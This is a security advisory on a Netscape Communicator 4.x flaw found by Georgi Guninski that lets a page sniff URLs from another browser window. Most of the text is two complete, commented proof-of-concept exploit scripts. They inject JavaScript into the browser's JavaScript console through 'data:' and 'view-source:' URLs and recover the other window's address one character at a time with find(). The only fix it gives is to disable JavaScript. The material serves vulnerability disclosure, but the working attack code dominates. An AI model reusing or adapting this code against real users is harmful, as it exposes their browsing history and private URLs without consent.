COMMAND
Netscape
SYSTEMS AFFECTED
Linux, NT with NS 4.x
PROBLEM
Georgi Guninski found the following bugs. There is a bug in Netscape
Communicator 4.6 Win95, 4.07 Linux (probably all 4.x are
affected), which allows sniffing URLs from another window. The
problem is the injection of JavaScript code in the JavaScript
console using the "data:" protocol. Access to document.links is
disallowed in NC 4.6, but the document may be read using find().
For more information, examine the source. Demonstration is
available at:
http://www.nat.bg/~joro/datatrack.html
Source goes like this:
<SCRIPT>
// Clear console
// Historical demonstration for Netscape Communicator 4.x: script is injected into
// the JavaScript console through a "data:" URL, as described in the advisory text.
// Every step depends on NC4-specific URL schemes (wysiwyg:, data:, javascript:) and
// on setTimeout() ordering, so the statement order below is significant.
// The "</'+'SCRIPT>" split keeps this literal from terminating the enclosing
// <SCRIPT> element of the page. The trailing bare identifier `error` is an
// intentional reference error (presumably so that a message appears in the
// console; not verifiable from this listing).
s='wysiwyg://1/data:text/html;,<SCRIPT>window.location = "javascript:@clear"; if (window.location=="JavaScript:@print") top.close(); error</'+'SCRIPT>';
// Open the data: document in a new window (global `b`); it is closed 2 s later.
b=window.open(s);
// A bare "javascript:" location opens the JavaScript console in NC4 — the
// window the advisory calls the injection target.
location="javascript:";
setTimeout("b.close();",2000);
/*
a=window.open('wysiwyg://1/about:blank');
a.location="javascript:MBEGIN";
setTimeout("a.close();",2000);
*/
// "Tracked" window: the global `tracked` is read later by datatrack() in the next
// <SCRIPT> element. The user is expected to navigate this window by hand; the
// 'Show URL' control mentioned in the text is not part of this listing.
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.6/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
</SCRIPT>
<SCRIPT>
// Recovers the tracked window's URL from the JavaScript console text ("data:" variant).
// Flow: (1) force a script error in the tracked window, (2) open a data: document whose
// script searches the console with find(), (3) re-open the console. Timing: the data:
// window is closed after 2 s, the console re-opened after 3 s, the injected loop runs
// after 4 s. Globals `tracked`, `s` and `a` are shared with the first <SCRIPT> element.
// NC4-only: wysiwyg:, data:, javascript: and window.find().
function datatrack()
{
// Evaluates the undefined identifier `error` in the tracked window; presumably the
// resulting error report (which names the document) ends up in the console — this is
// inferred from the advisory text, not visible in this listing.
tracked.location="javascript:error";
// The outer string is the source text of the injected script.
s="wysiwyg://1/data:text/html;,"
+"<SCRIPT> if (document.links.length > 1) "
+"{ "
// mend: marker text searched for first; mag: known URL prefix; res: text recovered so
// far; charstoread: upper bound on characters recovered.
+" mend='MEND';mag='http://';res=mag;charstoread=40;"
// "\\n" in this outer literal becomes "\n" in the injected source, i.e. a newline in
// the confirm() text.
+" msg='Your URL is: \\n';"
+ "setTimeout( ' "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
// Re-anchor the find position on the marker before each character probe.
+" find(mend);"
// Try every character code 1..255 appended to the current prefix;
// find(string, caseSensitive, backwards). There is no break, so the last matching
// code wins for this position.
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
// A space (code 32) ends the outer loop by pushing i past charstoread.
+" if (c==32) i=charstoread;"
+" } "
+" }"
+"}"
// Strip the known prefix and display the recovered text, then close the window.
+"res=res.substring(mag.length);"
+"confirm(msg+res);top.close();"
+" ',4000);"
// else branch: the bare identifier MEND is a reference error (presumably leaving the
// marker text in the console for find(mend) — inferred, not verifiable here).
+" } else MEND;</"
+"SCRIPT>";
a=window.open(s);
setTimeout('location="javascript:";',3000);
setTimeout('a.close();',2000);
}
</SCRIPT>
The same applies to the injection of JavaScript code into the
JavaScript console using the "view-source:" protocol.
Demonstration is available at:
http://www.nat.bg/~joro/viewtrack.html
Source goes like this:
<SCRIPT>
// Clear console
// "view-source:" variant of the console-clearing step. `s` is a view-source: URL
// wrapping a javascript: URL whose value is an HTML string carrying the same clearing
// script as the data: variant. The "</"+"SCRIPT>" split keeps the literal from
// terminating this page's <SCRIPT> element; the bare identifier `error` is an
// intentional reference error (presumed purpose: a message in the console — not
// verifiable from this listing). Assigns the global `s`.
function clearcon()
{
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>xxxxx<SCRIPT>window.location = \"javascript:@clear\"; if (window.location==\"JavaScript:@print\") top.close(); error</"+"SCRIPT>'";
// Navigates the current window itself; the window.open() alternative is commented out.
window.location=s;
/*
b=window.open(s);
*/
// A bare "javascript:" location opens the JavaScript console in NC4 (1 s later).
setTimeout('location="javascript:";',1000);
/*
setTimeout("b.close();",2000);
*/
}
// Run the console-clearing step 500 ms after this script executes; writeit() follows
// at 3 s, so the order is clearcon -> console -> tracked window.
setTimeout('clearcon()',500);
/*
a=window.open('wysiwyg://1/about:blank');
a.location="javascript:MBEGIN";
setTimeout("a.close();",2000);
*/
// Opens the "tracked" window (global `tracked`, read later by datatrack()) and fills it
// with instructions. The user is expected to navigate this window by hand; the
// 'Show URL' control mentioned in the text is not part of this listing.
function writeit()
{
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.6/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
}
// Create the tracked window 3 s after this script executes (after clearcon() at 500 ms).
setTimeout('writeit()',3000);
</SCRIPT>
<SCRIPT>
// Recovers the tracked window's URL from the JavaScript console text ("view-source:"
// variant). Same flow and timing as the data: variant: (1) force a script error in the
// tracked window, (2) open a document whose script searches the console with find(),
// (3) re-open the console; window closed after 2 s, console re-opened after 3 s, the
// injected loop runs after 4 s. Here the payload sits inside a single-quoted
// javascript: string, so the inner quotes are written as \". Globals `tracked`, `s`
// and `a` are shared with the preceding <SCRIPT> element. NC4-only: wysiwyg:,
// view-source:, javascript: and window.find().
function datatrack()
{
// Evaluates the undefined identifier `error` in the tracked window; presumably the
// resulting error report (which names the document) ends up in the console — this is
// inferred from the advisory text, not visible in this listing.
tracked.location="javascript:error";
// The outer string is the source text of the injected script.
s="view-source:wysiwyg://1/javascript:s='<TITLE>aa</TITLE>vvvv"
+"<SCRIPT> if (document.links.length > 1) "
+"{ "
// mend: marker text searched for first; mag: known URL prefix; res: text recovered so
// far; charstoread: upper bound on characters recovered.
+" mend=\"MEND\";mag=\"http://\";res=mag;charstoread=40;"
// "\\n" in this outer literal becomes "\n" in the injected source, i.e. a newline in
// the confirm() text.
+" msg=\"Your URL is: \\n\";"
+ "setTimeout( \" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
// Re-anchor the find position on the marker before each character probe.
+" find(mend);"
// Try every character code 1..255 appended to the current prefix;
// find(string, caseSensitive, backwards). There is no break, so the last matching
// code wins for this position.
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
// A space (code 32) ends the outer loop by pushing i past charstoread.
+" if (c==32) i=charstoread;"
+" } "
+" }"
+"}"
// Strip the known prefix and display the recovered text, then close the window.
+"res=res.substring(mag.length);"
+"confirm(msg+res);top.close();"
+" \",4000);"
// else branch: the bare identifier MEND is a reference error (presumably leaving the
// marker text in the console for find(mend) — inferred, not verifiable here).
+" } else MEND;</"
+"SCRIPT>'";
a=window.open(s);
setTimeout('location="javascript:";',3000);
setTimeout('a.close();',2000);
}
</SCRIPT>
SOLUTION
Workaround: Disable Javascript.